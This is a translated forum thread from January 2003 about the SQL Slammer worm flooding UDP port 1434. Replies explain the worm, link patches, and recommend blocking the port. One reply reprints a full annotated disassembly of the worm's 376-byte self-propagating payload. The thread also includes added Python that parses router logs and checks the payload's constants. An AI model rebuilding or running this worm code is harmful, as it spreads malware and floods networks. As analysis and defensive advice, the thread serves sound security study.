I'm under attack! Attack on UDP Port 1434


Morning Star
Jan 25, 2003, 3:04:29 AM
I'm on cable. When I went online tonight I suddenly found that I couldn't
reach a lot of websites. I looked at the lights on my cable modem and router
and saw that someone kept trying to connect to my IP address. I hurriedly
checked my router log and nearly fainted when I saw it. I get scanned by
attackers every day, but I've never actually been attacked. I never expected
that within an hour and a half more than 100 different IP addresses would try
to connect to mine. It looks like I've become the target of a DoS attack.
I can hardly connect to the Internet at all. Is there any way to prevent
DoS attacks?
Here is my router log:

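The router log format in the post above, parsed and classified as an added example (not code from the thread): the parser re-joins the wrapped lines, groups hits by destination service, and labels a service hit once each by many distinct sources as worm-style background scanning rather than a DoS aimed at this one host, which is the distinction the replies below draw. The sample lines are constructed in the router's format using documentation address ranges, and every function name is my own.

```python
"""Classify a home router's "Unrecognized access" log by traffic shape."""
import re
from datetime import datetime

# Constructed sample in the router's own line format (documentation address
# ranges, not real sources).  Some entries wrap onto a second line exactly as
# they do in the post, so the parser must re-join them first.
SAMPLE_LOG = """\
1/25/2003 12:30:55 AM Unrecognized access from 192.0.2.10:2938 to
UDP port 1434
1/25/2003 12:31:19 AM Unrecognized access from 198.51.100.7:3924 to
UDP port 1434
1/25/2003 12:35:30 AM Unrecognized access from 203.0.113.45:5948 to UDP port 1434
1/25/2003 12:52:29 AM Unrecognized access from 192.0.2.77:1657 to
TCP port 445
1/25/2003 12:52:32 AM Unrecognized access from 192.0.2.77:1657 to
TCP port 445
1/25/2003 1:01:30 AM Unrecognized access from 198.51.100.200:3003 to TCP
port 27374
1/25/2003 1:01:33 AM Unrecognized access from 198.51.100.200:3003 to TCP
port 27374
1/25/2003 1:03:20 AM Unrecognized access from 203.0.113.9:4600 to UDP
port 1434
"""

TS_START = re.compile(r"^\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M ")
LINE_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M) "
    r"Unrecognized access from (?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) "
    r"to (?P<proto>TCP|UDP) port (?P<dport>\d+)$"
)


def unwrap(text):
    """Re-join wrapped records: a line that does not start with a timestamp
    is the continuation of the previous record."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if TS_START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records


def parse_log(text):
    """Return one dict per record; records that do not match are skipped."""
    out = []
    for rec in unwrap(text):
        m = LINE_RE.match(rec)
        if not m:
            continue
        out.append({
            "ts": datetime.strptime(m["ts"], "%m/%d/%Y %I:%M:%S %p"),
            "src": m["src"],
            "proto": m["proto"],
            "dport": int(m["dport"]),
        })
    return out


def summarize(records):
    """Group by destination service: hits, distinct sources, time span."""
    summary = {}
    for r in records:
        key = (r["proto"], r["dport"])
        s = summary.setdefault(key, {"events": 0, "sources": set(),
                                     "first": r["ts"], "last": r["ts"]})
        s["events"] += 1
        s["sources"].add(r["src"])
        s["first"] = min(s["first"], r["ts"])
        s["last"] = max(s["last"], r["ts"])
    for s in summary.values():
        s["span_minutes"] = (s["last"] - s["first"]).total_seconds() / 60
    return summary


def classify(summary, min_sources=3):
    """Label each service by the shape of the traffic, not its volume.
    Many distinct sources each hitting one port about once is what a scanning
    worm looks like from any single vantage point; one source hitting the same
    port repeatedly is a probe aimed at this host."""
    labels = {}
    for key, s in summary.items():
        n_src = len(s["sources"])
        if n_src >= min_sources and s["events"] <= 2 * n_src:
            labels[key] = (f"distributed: {n_src} sources, {s['events']} hits in "
                           f"{s['span_minutes']:.0f} min (worm-style background scanning)")
        elif n_src == 1:
            labels[key] = f"single-source: {s['events']} hits from {next(iter(s['sources']))}"
        else:
            labels[key] = f"mixed: {n_src} sources, {s['events']} hits"
    return labels


if __name__ == "__main__":
    for key, label in sorted(classify(summarize(parse_log(SAMPLE_LOG))).items()):
        print(f"{key[0]}/{key[1]}: {label}")
```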

我是男的= =
Jan 25, 2003, 8:51:59 AM
It's not you who's being attacked, but most of the networks in the whole country. It's foreign hackers attacking.
※ Quoting 《dma...@softhome.net (Morning Star)》:
--
[1;30;40m夫兵者不祥之器物或惡之故有道者不處君子居則貴左用兵則貴右兵者不祥之器非君子 [m
[1;30m之器不得已而用之恬淡為上勝而不美而美之者是樂殺人夫樂殺人者則不可得志於天下 [m
[1;30m矣吉事尚左凶事尚右偏將軍居左上將軍居右言以喪禮處之殺人 [37mwretch.twbbs.org [30m勝以 [m
[1;30m喪禮處之道常 [37m無名 [30m樸雖小天下莫能臣侯王若能守之萬物將自賓天地相合以降甘露民莫 [m
[1;30m之令而自均始制有名名亦既有夫亦將知止知止可以不殆譬道之在 [37m218.187.122.134 [30m海 [m

傲笑紅塵是主角
Jan 25, 2003, 10:34:47 AM

http://www.cert.org.tw/news/030125.php

It's not an attack. Look at this, the latest security advisory.

Jan 25, 2003, 10:32:01 AM
==> dma0021. wrote:
> I'm on cable. When I went online tonight I suddenly found that I couldn't
> reach a lot of websites. I looked at the lights on my cable modem and router
> and saw that someone kept trying to connect to my IP address. I hurriedly
> checked my router log and nearly fainted when I saw it. I get scanned by
> attackers every day, but I've never actually been attacked. I never expected
> that within an hour and a half more than 100 different IP addresses would try
> to connect to mine. It looks like I've become the target of a DoS attack.
> I can hardly connect to the Internet at all. Is there any way to prevent DoS attacks?

Hmm...

From: "Jeremy Kister" <securityfo...@jeremykister.com>, Board: bugtraq
Subject: Fw: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
Posting site: "Jeremy Kister" (Sat Jan 25 17:20:07 2003)
Relay: lls!main.gmane.org!not-for-mail
Origin: main.gmane.org

Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp

MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al).
There are two problems that yield the ability to execute code remotely while
unauthenticated.



吹向法國的風^^~(b)
Jan 25, 2003, 10:29:20 AM
《 In the post by LHD...@wretch.csie.nctu.edu.tw (我是男的= =): 》
: It's not you who's being attacked, but most of the networks in the whole country. It's foreign hackers attacking.

It's a virus...
Once again it's a problem with Microsoft SQL...
If you're interested, see the following URLs

http://www.trend.com.tw/homepage/link.asp?loc=alert&URL=/vinfo/
http://slashdot.org/articles/03/01/25/1245206.shtml?tid=109


Nanika
Jan 25, 2003, 2:38:44 PM

Nanika:

Watch out for the SQL worm~~

Affected software and systems:
====================
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 2000
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000

This SQL worm exploits the
Microsoft SQL Server 2000 Resolution Service remote heap buffer overflow vulnerability
published last year.

Vulnerability details
http://www.nextgenss.com/advisories/mssql-udp.txt

How the worm attacks
Infected hosts send large numbers of packets to random addresses, producing a UDP flood.


Patch download
http://www.microsoft.com/Downloads/details.aspx?displaylang=en&FamilyID=DCFDCBE9-B4EB-4446-9BE7-2DE45CFA6A89
or
http://www.digitaloffense.net/worms/mssql_udp_worm/Q323875_SQL2000_SP2_en.EXE

Worm analysis

00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 68DCC9B042 push dword 0x42b0c9dc
0000000D B801010101 mov eax,0x1010101
00000012 31C9 xor ecx,ecx
00000014 B118 mov cl,0x18
00000016 50 push eax
00000017 E2FD loop 0x16
00000019 3501010105 xor eax,0x5010101
0000001E 50 push eax
0000001F 89E5 mov ebp,esp
00000021 51 push ecx
00000022 682E646C6C push dword 0x6c6c642e
00000027 68656C3332 push dword 0x32336c65
0000002C 686B65726E push dword 0x6e72656b
00000031 51 push ecx
00000032 686F756E74 push dword 0x746e756f
00000037 6869636B43 push dword 0x436b6369
0000003C 6847657454 push dword 0x54746547
00000041 66B96C6C mov cx,0x6c6c
00000045 51 push ecx
00000046 6833322E64 push dword 0x642e3233
0000004B 687773325F push dword 0x5f327377
00000050 66B96574 mov cx,0x7465
00000054 51 push ecx
00000055 68736F636B push dword 0x6b636f73
0000005A 66B9746F mov cx,0x6f74
0000005E 51 push ecx
0000005F 6873656E64 push dword 0x646e6573
00000064 BE1810AE42 mov esi,0x42ae1018
00000069 8D45D4 lea eax,[ebp-0x2c]
0000006C 50 push eax
0000006D FF16 call near [esi]
0000006F 50 push eax
00000070 8D45E0 lea eax,[ebp-0x20]
00000073 50 push eax
00000074 8D45F0 lea eax,[ebp-0x10]
00000077 50 push eax
00000078 FF16 call near [esi]
0000007A 50 push eax
0000007B BE1010AE42 mov esi,0x42ae1010
00000080 8B1E mov ebx,[esi]
00000082 8B03 mov eax,[ebx]
00000084 3D558BEC51 cmp eax,0x51ec8b55
00000089 7405 jz 0x90
0000008B BE1C10AE42 mov esi,0x42ae101c
00000090 FF16 call near [esi]
00000092 FFD0 call eax
00000094 31C9 xor ecx,ecx
00000096 51 push ecx
00000097 51 push ecx
00000098 50 push eax
00000099 81F10301049B xor ecx,0x9b040103
0000009F 81F101010101 xor ecx,0x1010101
000000A5 51 push ecx
000000A6 8D45CC lea eax,[ebp-0x34]
000000A9 50 push eax
000000AA 8B45C0 mov eax,[ebp-0x40]
000000AD 50 push eax
000000AE FF16 call near [esi]
000000B0 6A11 push byte +0x11
000000B2 6A02 push byte +0x2
000000B4 6A02 push byte +0x2
000000B6 FFD0 call eax
000000B8 50 push eax
000000B9 8D45C4 lea eax,[ebp-0x3c]
000000BC 50 push eax
000000BD 8B45C0 mov eax,[ebp-0x40]
000000C0 50 push eax
000000C1 FF16 call near [esi]
000000C3 89C6 mov esi,eax
000000C5 09DB or ebx,ebx
000000C7 81F33C61D9FF xor ebx,0xffd9613c
000000CD 8B45B4 mov eax,[ebp-0x4c]
000000D0 8D0C40 lea ecx,[eax+eax*2]
000000D3 8D1488 lea edx,[eax+ecx*4]
000000D6 C1E204 shl edx,0x4
000000D9 01C2 add edx,eax
000000DB C1E208 shl edx,0x8
000000DE 29C2 sub edx,eax
000000E0 8D0490 lea eax,[eax+edx*4]
000000E3 01D8 add eax,ebx
000000E5 8945B4 mov [ebp-0x4c],eax
000000E8 6A10 push byte +0x10
000000EA 8D45B0 lea eax,[ebp-0x50]
000000ED 50 push eax
000000EE 31C9 xor ecx,ecx
000000F0 51 push ecx
000000F1 6681F17801 xor cx,0x178
000000F6 51 push ecx
000000F7 8D4503 lea eax,[ebp+0x3]
000000FA 50 push eax
000000FB 8B45AC mov eax,[ebp-0x54]
000000FE 50 push eax
000000FF FFD6 call esi
00000101 EBCA jmp short 0xcd

Detailed analysis
warning #1: i do not do much windows programming.
warning #2: i have not slept much lately.

this worm is completely contained inside its 376 byte payload;
i disassembled the code itself (search for "start here") after
the nops to find out what it does. there are some annotations;
most should make sense but feel free to let me know if i'm
way off.

the short story: it sends copies of itself to everyone.
it does not store anything on the file system or even change
anything directly. i do not know where the flaw in sqlserver
is, although it seems like this is pretty well known already
(for instance, there is a similar exploit at
http://www.ysgnet.com/hn/exploits/adv_win32_shellcode.txt)
shutting down sqlserver will completely stop this (although
you will still be vulnerable again, of course)

this was disassembled from www.boredom.org/~cstone/onepacket
which is a pcap capture of a single packet.

if you don't know how to work objdump, here's how:
objdump -s -m i386 -b binary -z --disassemble-all --start-address 0xc0 --show-raw-insn duh.pcap

--cst...@pobox.com

--- start here
ce: 90 nop
cf: 68 dc c9 b0 42 push $0x42b0c9dc
d4: b8 01 01 01 01 mov $0x1010101,%eax
d9: 31 c9 xor %ecx,%ecx
db: b1 18 mov $0x18,%cl
dd: 50 push %eax
de: e2 fd loop 0xdd
e1: 35 01 01 01 05 xor $0x5010101,%eax
e5: 50 push %eax
e6: 89 e5 mov %esp,%ebp
e8: 51 push %ecx

these push a mini-symbol table on the stack.
initially it looks something like this:
sendto00 cb
socket00 d3
ws2_32.d db
ll00GetT e3
ickCount eb
0000kern f3
el32.dll fb
00000004
^ ebp

e9: 68 2e 64 6c 6c push $0x6c6c642e
ee: 68 65 6c 33 32 push $0x32336c65
f3: 68 6b 65 72 6e push $0x6e72656b
f8: 51 push %ecx
f9: 68 6f 75 6e 74 push $0x746e756f
fe: 68 69 63 6b 43 push $0x436b6369
103: 68 47 65 74 54 push $0x54746547
108: 66 b9 6c 6c mov $0x6c6c,%cx
10c: 51 push %ecx
10d: 68 33 32 2e 64 push $0x642e3233
112: 68 77 73 32 5f push $0x5f327377
117: 66 b9 65 74 mov $0x7465,%cx
11b: 51 push %ecx
11c: 68 73 6f 63 6b push $0x6b636f73
121: 66 b9 74 6f mov $0x6f74,%cx
125: 51 push %ecx
126: 68 73 65 6e 64 push $0x646e6573
12b: be 18 10 ae 42 mov $0x42ae1018,%esi

# find sendto in ws2_32.dll
130: 8d 45 d4 lea 0xffffffd4(%ebp),%eax ## ws2_32.dll:sendto
133: 50 push %eax
134: ff 16 call *(%esi)
136: 50 push %eax # SND2
# find GetTickCount
137: 8d 45 e0 lea 0xffffffe0(%ebp),%eax ## GetTickCount
13a: 50 push %eax
13b: 8d 45 f0 lea 0xfffffff0(%ebp),%eax ## kernel32.dll
13e: 50 push %eax
13f: ff 16 call *(%esi)
141: 50 push %eax # GETT


# GetProcAddr apparently appears in different locations -- this one
# tries both
142: be 10 10 ae 42 mov $0x42ae1010,%esi # try 1 for GetProcAddress
147: 8b 1e mov (%esi),%ebx
149: 8b 03 mov (%ebx),%eax
14b: 3d 55 8b ec 51 cmp $0x51ec8b55,%eax # is this the right proc?
150: 74 05 je 0x157 # if we're ok then go ahead
152: be 1c 10 ae 42 mov $0x42ae101c,%esi # try 2 for GetProcAddress
157: ff 16 call *(%esi)

159: ff d0 call *%eax # call GetTickCount
15b: 31 c9 xor %ecx,%ecx
15d: 51 push %ecx #
15e: 51 push %ecx #
15f: 50 push %eax # push the tick count

# 0 ^ 0x9b040103 ^ 0x01010101 = 0x9a050002; this goes in
# little-endian; 0x59a is 1434, our port and 0002 is the family
# (AF_INET)
160: 81 f1 03 01 04 9b xor $0x9b040103,%ecx
166: 81 f1 01 01 01 01 xor $0x1010101,%ecx
16c: 51 push %ecx
16d: 8d 45 cc lea 0xffffffcc(%ebp),%eax # socket
170: 50 push %eax
171: 8b 45 c0 mov 0xffffffc0(%ebp),%eax # handle; SND2
174: 50 push %eax
175: ff 16 call *(%esi)

177: 6a 11 push $0x11 # protocol 17 - udp
179: 6a 02 push $0x2 # socket type SOCK_DGRAM
17b: 6a 02 push $0x2 # AF_INET
17d: ff d0 call *%eax # call socket
17f: 50 push %eax # push socket (SOCK) at ffffffb0(%ebp)
180: 8d 45 c4 lea 0xffffffc4(%ebp),%eax # get sendto addr
183: 50 push %eax
184: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
187: 50 push %eax
188: ff 16 call *(%esi)


# it is almost ready to call sendto at this point -- however, GetTickCount
# was not sufficiently random enough for this guy, so he plays around
# with the address a bit before finally pushing it back into 0xffffffb4(%ebp)
# this mangling also ensures that it can loop without calling GetTickCount
# again, and get a different address.
# (although the quality of randomness is obviously in question here)
18a: 89 c6 mov %eax,%esi # move sendto addr
18c: 09 db or %ebx,%ebx # for mangling
18e: 81 f3 3c 61 d9 ff xor $0xffd9613c,%ebx

# start of the loop
194: 8b 45 b4 mov 0xffffffb4(%ebp),%eax # mov addr to eax
197: 8d 0c 40 lea (%eax,%eax,2),%ecx # mangle the address.
19a: 8d 14 88 lea (%eax,%ecx,4),%edx
19d: c1 e2 04 shl $0x4,%edx
1a0: 01 c2 add %eax,%edx
1a2: c1 e2 08 shl $0x8,%edx
1a5: 29 c2 sub %eax,%edx
1a7: 8d 04 90 lea (%eax,%edx,4),%eax
1aa: 01 d8 add %ebx,%eax # okay done mangling
1ac: 89 45 b4 mov %eax,0xffffffb4(%ebp)
1af: 6a 10 push $0x10 # length of the sockaddr
1b1: 8d 45 b0 lea 0xffffffb0(%ebp),%eax # b0 is where sockaddr starts
1b4: 50 push %eax # push sockaddr
1b5: 31 c9 xor %ecx,%ecx
1b7: 51 push %ecx # flags - none
1b8: 66 81 f1 78 01 xor $0x178,%cx # 376 bytes; the length
1bd: 51 push %ecx
1be: 8d 45 03 lea 0x3(%ebp),%eax # get the beginning of the buffer
1c1: 50 push %eax # push addr
1c2: 8b 45 ac mov 0xffffffac(%ebp),%eax # get socket handle
1c5: 50 push %eax #
1c6: ff d6 call *%esi # call sendto
1c8: eb ca jmp 0x194 # jump back and do this again
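As an added example (not from the thread and not from cstone's analysis), the following Python re-does the arithmetic behind three of the comments in the listing above: the pushed immediates that form the mini symbol table, the two XORs that yield 0x9a050002 (AF_INET, port 1434), and the lea/shl/add chain that "mangles" the destination address between sendto calls. Function names are my own; the constants are the ones in the listing plus the 214013/2531011 pair of the Microsoft C runtime's rand(), which the multiply chain reproduces.

```python
"""Check the constants in the annotated Slammer listing by plain arithmetic.

Nothing here opens a socket or sends anything; it only transcribes the
instruction sequences into Python so the comments can be verified.
"""
import struct

MASK32 = 0xFFFFFFFF


def decode_pushed_strings(pushes):
    """Rebuild the memory image left by a sequence of 32-bit pushes.

    Each push moves esp down by 4, so the first value pushed sits at the
    highest address; reversing the list gives memory order, which is then
    read as little-endian dwords and split at NUL bytes.
    """
    image = b"".join(struct.pack("<I", v) for v in reversed(pushes))
    return [s.decode("ascii") for s in image.split(b"\0") if s]


# Immediates in the order the listing pushes them (offsets e9..126).  A bare
# `push %ecx` pushes 0 (ecx is 0 once the fill loop has counted down) or the
# 16-bit value loaded into %cx just before it, with the upper half still 0.
SYMBOL_PUSHES = [
    0x6c6c642e, 0x32336c65, 0x6e72656b, 0x00000000,   # .dll el32 kern \0\0\0\0
    0x746e756f, 0x436b6369, 0x54746547, 0x00006c6c,   # ount ickC GetT ll\0\0
    0x642e3233, 0x5f327377, 0x00007465, 0x6b636f73,   # 32.d ws2_ et\0\0 sock
    0x00006f74, 0x646e6573,                           # to\0\0 send
]


def sockaddr_header(xor1=0x9b040103, xor2=0x01010101):
    """ecx starts at 0 and is XORed twice (offsets 160 and 166); two XORs are
    needed because the target value contains NUL bytes that the immediates
    must avoid.  Returns the dword and the sin_family / sin_port it encodes
    once it sits in memory."""
    value = (0 ^ xor1 ^ xor2) & MASK32
    raw = struct.pack("<I", value)            # byte order on the stack
    family = struct.unpack("<H", raw[:2])[0]  # sin_family, host order
    port = struct.unpack("!H", raw[2:])[0]    # sin_port, network order
    return value, family, port


def mangle_address(addr, ebx):
    """Literal transcription of offsets 197..1aa, one line per instruction.
    The lea/shl/add/sub chain is a multiply by 214013 spread over
    NUL-free instructions; ebx is then added."""
    eax = addr
    ecx = (eax + eax * 2) & MASK32      # lea (%eax,%eax,2),%ecx  ->     3*a
    edx = (eax + ecx * 4) & MASK32      # lea (%eax,%ecx,4),%edx  ->    13*a
    edx = (edx << 4) & MASK32           # shl $0x4,%edx           ->   208*a
    edx = (edx + eax) & MASK32          # add %eax,%edx           ->   209*a
    edx = (edx << 8) & MASK32           # shl $0x8,%edx           -> 53504*a
    edx = (edx - eax) & MASK32          # sub %eax,%edx           -> 53503*a
    eax = (eax + edx * 4) & MASK32      # lea (%eax,%edx,4),%eax  -> 214013*a
    return (eax + ebx) & MASK32         # add %ebx,%eax


LCG_MULTIPLIER = 214013
LCG_INCREMENT = 2531011    # 0x269ec3; the pair used by the MS C runtime rand()
XOR_CONST = 0xffd9613c     # the immediate at offset 18e; equals ~LCG_INCREMENT


def matches_lcg(addr, ebx):
    """The mangling is the linear congruential step x' = 214013*x + ebx mod 2^32."""
    return mangle_address(addr, ebx) == (LCG_MULTIPLIER * addr + ebx) & MASK32


def effective_increment(ebx_before):
    """Offsets 18c..18e: `or %ebx,%ebx` leaves ebx unchanged (an `xor` would
    have zeroed it), so the increment actually added each round is
    ebx ^ 0xffd9613c, where ebx is whatever it held, i.e. the import-slot
    pointer loaded at offset 147, rather than a fixed constant."""
    ebx = (ebx_before | ebx_before) & MASK32
    return (ebx ^ XOR_CONST) & MASK32


def address_as_ip(dword):
    """sin_addr as it lands in memory: the dword's bytes in little-endian order."""
    return ".".join(str(b) for b in struct.pack("<I", dword))


if __name__ == "__main__":
    print(decode_pushed_strings(SYMBOL_PUSHES))
    print("%#x -> family %d, port %d" % sockaddr_header())
    print("xor constant is ~2531011:", XOR_CONST == LCG_INCREMENT ^ MASK32)
    print("increment with ebx=0x42ae1010: %#x" % effective_increment(0x42ae1010))
```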


我是大笨蛋
Jan 25, 2003, 11:35:43 PM
【 In the post by yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角): 】
: http://www.cert.org.tw/news/030125.php
: It's not an attack. Look at this, the latest security advisory.

Sigh~ my machine got hit too. Yesterday the traffic shot up to almost 5MB....
I installed SQL 2k SP3 but it doesn't seem to help.... how can that be? >_<

Nanika
Jan 26, 2003, 12:31:09 AM

Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
and the packets it sends are themselves attack packets that exploit this vulnerability,
sent to random addresses, so unpatched machines get hit one after another and
start sending too. You could consider closing UDP 1434 first,
while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.


傲笑紅塵是主角
Jan 26, 2003, 12:36:47 AM
※ Quoting 《minja...@yahoo.com.tw (Nanika)》:

Re: You only need to look at the machines with SQL Server 2000 installed. Stop the service first,
install SQL Service Pack 3, and that's it.
But getting your own internal SQL servers fixed can't prevent other people's machines outside from
launching DDoS attacks, which is why they recommend filtering out UDP 1434 packets at the firewall first,
so your company's internal SQL servers can't attack others and other people's packets can't attack you either.



我是大笨蛋
Jan 26, 2003, 1:40:15 AM
【 In the post by yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角): 】
: ※ Quoting 《minja...@yahoo.com.tw (Nanika)》:

: > Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
: > and the packets it sends are themselves attack packets that exploit this vulnerability,
: > sent to random addresses, so unpatched machines get hit one after another and
: > start sending too. You could consider closing UDP 1434 first,
: > while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.
: Re: You only need to look at the machines with SQL Server 2000 installed. Stop the service first,
: install SQL Service Pack 3, and that's it.
: But getting your own internal SQL servers fixed can't prevent other people's machines outside from
: launching DDoS attacks, which is why they recommend filtering out UDP 1434 packets at the firewall first,
: so your company's internal SQL servers can't attack others and other people's packets can't attack you either.

I installed SP3, but it looks like it's still not working?
Looking at the firewall log I see that the server keeps scanning outside IPs (dst port=1433, not 1434)

Could it be that it caught some other virus as well?

Sigh......



我是大笨蛋
Jan 26, 2003, 1:48:11 AM
【 In the post by yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角): 】
: ※ Quoting 《minja...@yahoo.com.tw (Nanika)》:
: > Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
: > and the packets it sends are themselves attack packets that exploit this vulnerability,
: > sent to random addresses, so unpatched machines get hit one after another and
: > start sending too. You could consider closing UDP 1434 first,
: > while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.
: Re: You only need to look at the machines with SQL Server 2000 installed. Stop the service first,
: install SQL Service Pack 3, and that's it.
: But getting your own internal SQL servers fixed can't prevent other people's machines outside from
: launching DDoS attacks, which is why they recommend filtering out UDP 1434 packets at the firewall first,
: so your company's internal SQL servers can't attack others and other people's packets can't attack you either.

Trend Micro removal tool:
http://www.trend.com.tw/vinfo/virusencyclo/default5.asp?VName=WORM_SQLP1434.A

good luck

Nanika
Jan 26, 2003, 2:46:55 AM

"傲笑紅塵是主角" <yamm...@bbs.csie.nctu.edu.tw> wrote in message
news:44S5al$S...@bbs.csie.nctu.edu.tw...
> ※ Quoting 《minja...@yahoo.com.tw (Nanika)》:

> Re: You only need to look at the machines with SQL Server 2000 installed. Stop the service first,
> install SQL Service Pack 3, and that's it.
> But getting your own internal SQL servers fixed can't prevent other people's machines outside from
> launching DDoS attacks, which is why they recommend filtering out UDP 1434 packets at the firewall first,
> so your company's internal SQL servers can't attack others and other people's packets can't attack you either.

You're right, it can't prevent attacks from external IPs. But on a network with a firewall, if it's
configured well, the outside normally has no way to reach internal IPs on UDP 1434.


活著
Jan 27, 2003, 1:04:26 AM
※ Quoting 《Besse...@bbs.nsysu.edu.tw (我將歸來開放)》:

> > Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
> > and the packets it sends are themselves attack packets that exploit this vulnerability,
> > sent to random addresses, so unpatched machines get hit one after another and
> > start sending too. You could consider closing UDP 1434 first,
> > while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.
> I just took a database course this semester
> The teacher recommended we use SQL 2000
> Not long after installing it, I got hit
> Microsoft's products are the most widespread
> so it's understandable that they become hackers' targets
> but Microsoft itself should recognise that too, right?
> All they did was express regret over this attack
> and say the vulnerability was published long ago and users should download the fix themselves
> This is their attitude every time
> I've decided to switch to MySQL from now on

The vulnerability and the patch were published last year, and half a year later you still hadn't done anything?

The one to blame is yourself, not Microsoft.

If you use MySQL and don't patch your holes, you'll die just the same when the time comes.

And then you'll blame someone else again?



想太多-.-
Jan 27, 2003, 2:29:46 AM
※ Quoting 《fool...@bbs.pu.edu.tw (我是大笨蛋)》:
> 【 In the post by yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角): 】
> : Re: You only need to look at the machines with SQL Server 2000 installed. Stop the service first,

> : install SQL Service Pack 3, and that's it.
> : But getting your own internal SQL servers fixed can't prevent other people's machines outside from
> : launching DDoS attacks, which is why they recommend filtering out UDP 1434 packets at the firewall first,
> : so your company's internal SQL servers can't attack others and other people's packets can't attack you either.
> I installed SP3, but it looks like it's still not working?
> Looking at the firewall log I see that the server keeps scanning outside IPs (dst port=1433, not 1434)
> Could it be that it caught some other virus as well?
> Sigh......
1433 is a different virus; Trend Micro calls it "JS_SQLSPIDA.B".

DANTE
Jan 27, 2003, 10:02:33 AM

> This is their attitude every time
> I've decided to switch to MySQL from now on


Do you think MySQL has no bugs???
That's impossible..
Every update is there to fix bugs and add features that should have been there
Nobody is a god.. as long as a program is written by a human, nobody dares claim it has no bugs

ps: maybe even hello world has some ^^

Palatis
Jan 27, 2003, 12:10:12 PM

我將歸來開放 wrote:

>> ==> From the article by minja...@yahoo.com.tw (Nanika):


>> Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
>> and the packets it sends are themselves attack packets that exploit this vulnerability,
>> sent to random addresses, so unpatched machines get hit one after another and
>> start sending too. You could consider closing UDP 1434 first,
>> while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.
>
> I just took a database course this semester
> The teacher recommended we use SQL 2000
> Not long after installing it, I got hit
>
> Microsoft's products are the most widespread
> so it's understandable that they become hackers' targets
> but Microsoft itself should recognise that too, right?
> All they did was express regret over this attack
> and say the vulnerability was published long ago and users should download the fix themselves
> This is their attitude every time
>
> I've decided to switch to MySQL from now on
>

...
It confirms an old saying -- "There are no bad systems, only stupid users."

A stupid user is clumsy with whatever they use;
a smart user can get the best performance (efficiency) even out of a mediocre system.

SQL 2000 is a database that's easy to install and manage, and its features are complete, but its performance, security and stability are...
The Windows version of MySQL costs money, and its feature set isn't complete either.
If you really want a full-featured, high-performance SQL server, give PgSQL a try!


想太多-.-
Jan 27, 2003, 12:17:38 PM
※ Quoting 《DANTE (DANTE)》:

> > This is their attitude every time
> > I've decided to switch to MySQL from now on
> Do you think MySQL has no bugs???
> That's impossible..
> Every update is there to fix bugs and add features that should have been there
> Nobody is a god.. as long as a program is written by a human, nobody dares claim it has no bugs
> ps: maybe even hello world has some ^^
Hello world wouldn't hello its way into a buffer overflow, would it @@

遺憾
Jan 27, 2003, 8:56:05 PM
《 In the post by Besse...@bbs.nsysu.edu.tw (我將歸來開放): 》
: > ==> From the article by minja...@yahoo.com.tw (Nanika):

: > Because of this worm, any machine that hasn't yet patched the SQL vulnerability can be attacked,
: > and the packets it sends are themselves attack packets that exploit this vulnerability,
: > sent to random addresses, so unpatched machines get hit one after another and
: > start sending too. You could consider closing UDP 1434 first,
: > while waiting for the internal hosts, or tracking them down, to patch the vulnerability and stop the attack.
: I just took a database course this semester
: The teacher recommended we use SQL 2000
: Not long after installing it, I got hit
: Microsoft's products are the most widespread
: so it's understandable that they become hackers' targets
: but Microsoft itself should recognise that too, right?
: All they did was express regret over this attack
: and say the vulnerability was published long ago and users should download the fix themselves
: This is their attitude every time
: I've decided to switch to MySQL from now on

Let me be honest:
with your attitude
you won't escape being attacked no matter what you use.
First ask yourself
why, when the fix came out half a year ago,
you hadn't installed it.



我是大笨蛋
Jan 28, 2003, 5:59:21 AM
【 In the post by yugibe...@bbs.tku.edu.tw (遺憾): 】
: 《 In the post by Besse...@bbs.nsysu.edu.tw (我將歸來開放): 》
: : I just took a database course this semester

: : The teacher recommended we use SQL 2000
: : Not long after installing it, I got hit
: : Microsoft's products are the most widespread
: : so it's understandable that they become hackers' targets
: : but Microsoft itself should recognise that too, right?
: : All they did was express regret over this attack
: : and say the vulnerability was published long ago and users should download the fix themselves
: : This is their attitude every time
: : I've decided to switch to MySQL from now on
: Let me be honest:
: with your attitude
: you won't escape being attacked no matter what you use.
: First ask yourself
: why, when the fix came out half a year ago,
: you hadn't installed it.

Hmm~ there are no insecure systems, only insecure people.....



叫流行來追我 ^_^
Jan 28, 2003, 11:51:16 PM
